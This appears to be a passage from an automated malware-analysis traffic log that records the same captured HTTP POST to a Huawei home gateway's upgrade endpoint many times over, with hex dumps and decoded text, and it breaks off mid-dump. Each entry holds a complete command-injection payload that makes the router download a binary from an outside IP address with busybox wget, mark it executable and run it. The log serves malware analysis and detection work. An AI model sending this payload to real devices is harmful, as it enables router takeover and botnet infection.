          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 453Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 